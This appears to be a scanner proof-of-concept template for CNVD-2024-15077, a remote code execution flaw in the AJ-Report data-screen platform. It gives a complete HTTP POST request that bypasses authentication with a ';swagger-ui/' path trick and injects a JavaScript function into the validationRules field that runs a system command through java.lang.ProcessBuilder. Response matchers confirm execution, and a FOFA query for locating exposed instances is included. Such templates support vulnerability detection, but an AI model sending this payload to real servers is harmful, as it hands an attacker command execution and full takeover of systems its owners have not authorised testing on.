## id: CNVD-2024-15077
## name: AJ-Report Open Source Data Screen - Remote Code Execution
## author: hack007x
## severity: high
## tags: cnvd,cnvd2024,aj-report,rce,vuln
## description: AJ Report The platform can execute commands in the corresponding value of the validationRules parameter through post method, obtain server permissions, and log in to the management background to take over the large screen. If it is used by lawless elements to write reactionary slogans, the harmful consequences will be very serious.
## affects: aj-report
## reference: https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
## reference: https://github.com/vulhub/vulhub/blob/master/aj-report/CNVD-2024-15077/README.md
## fofa-query: title="AJ-Report"
## verification: true

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/json;charset=UTF-8

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

#@ condition: and
#@ matcher: body contains "code"
#@ matcher: body contains "data"
#@ matcher: body matches /uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)/
#@ matcher: status_code == 200





# @VEIL-STAMP: 26908e5ce4e34bceaeac5a27a03dde6d28bfc88e2c31e1ec1eada567b723521d
